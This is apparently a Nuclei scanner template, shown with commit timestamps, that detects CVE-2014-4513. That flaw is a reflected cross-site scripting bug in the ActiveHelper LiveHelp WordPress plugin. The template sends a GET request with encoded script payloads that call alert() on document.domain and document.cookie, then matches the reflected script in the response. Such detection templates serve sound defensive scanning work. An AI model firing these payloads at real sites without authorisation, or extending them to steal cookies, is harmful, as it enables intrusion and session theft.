2021-07-14 23:59:13 +00:00
id : CVE-2014-4513
info :
2022-02-25 14:32:23 +00:00
name : ActiveHelper LiveHelp Server 3.1.0 - Reflected Cross-Site Scripting
2021-07-14 23:59:13 +00:00
author : daffainfo
severity : medium
2022-02-25 14:32:23 +00:00
description : Multiple cross-site scripting vulnerabilities in server/offline.php in the ActiveHelper LiveHelp Live Chat plugin 3.1.0 and earlier for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) MESSAGE, (2) EMAIL, or (3) NAME parameter.
2022-04-22 10:38:41 +00:00
reference :
- https://nvd.nist.gov/vuln/detail/CVE-2014-4513
2022-05-17 09:18:12 +00:00
- http://codevigilant.com/disclosure/wp-plugin-activehelper-livehelp-a3-cross-site-scripting-xss
2022-02-25 14:32:23 +00:00
classification :
cve-id : CVE-2014-4513
2022-04-22 10:38:41 +00:00
tags : cve,cve2014,wordpress,xss,wp-plugin
2021-07-14 23:59:13 +00:00
requests :
- method : GET
path :
2021-07-19 05:40:50 +00:00
- '{{BaseURL}}/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&'
2021-07-14 23:59:13 +00:00
matchers-condition : and
matchers :
- type : word
words :
2021-07-19 05:40:50 +00:00
- "</textarea></script><script>alert(document.domain)</script>"
2021-07-14 23:59:13 +00:00
part : body
- type : word
part : header
words :
- text/html
- type : status
status :
- 200
2022-02-25 14:32:23 +00:00
# Enhanced by mp on 2022/02/24